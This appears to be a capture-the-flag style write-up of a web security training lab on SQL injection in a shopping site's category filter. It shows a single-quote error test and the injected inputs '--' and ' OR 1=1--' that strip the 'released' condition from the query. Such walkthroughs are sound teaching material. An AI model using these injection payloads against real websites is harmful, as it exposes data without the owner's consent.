SQL Injection in WHERE Clause

2023/07/22 1:09PM

Description

This lab contains a SQL injection vulnerability in the product category filter. When the user selects a category, the application carries out a SQL query like the following:

SELECT * FROM products WHERE category = 'Gifts' AND released = 1

To solve the lab, perform a SQL injection attack that causes the application to display one or more unreleased products.

Getting Started

Once the lab is loaded we are greeted with a shopping website. On the website we can view products and "Refine your search" to filter products.

When filtering by "Pets" the URL will look like so:

https://0a90009e04d619d180f0851300c30014.web-security-academy.net/filter?category=Pets

From the lab description we can tell that the Pets value is being put into the SQL query like so:

SELECT * FROM products WHERE category = 'Pets' AND released = 1

Error-Based SQL Injection

We can test for Error-Based SQL injection by simply putting a single quote and checking for a Server Error.

https://0a90009e04d619d180f0851300c30014.web-security-academy.net/filter?category=Pets'

We indeed do get a Server Error when injection a single quote.

We get a Server Error because the SQL syntax will be invalid:

SELECT * FROM products WHERE category = 'Pets'' AND released = 1

Unreleased Data

To return values in the database that are unreleased, we can comment out the "AND released = 1".

SELECT * FROM products WHERE category = 'Pets'-- ' AND released = 1

The resulting SQL query returns an unreleased product, but didn't solve the lab for some reason. To return all products, we can inject the following ' OR 1=1--

SELECT * FROM products WHERE category = 'Pets' OR 1=1-- ' AND released = 1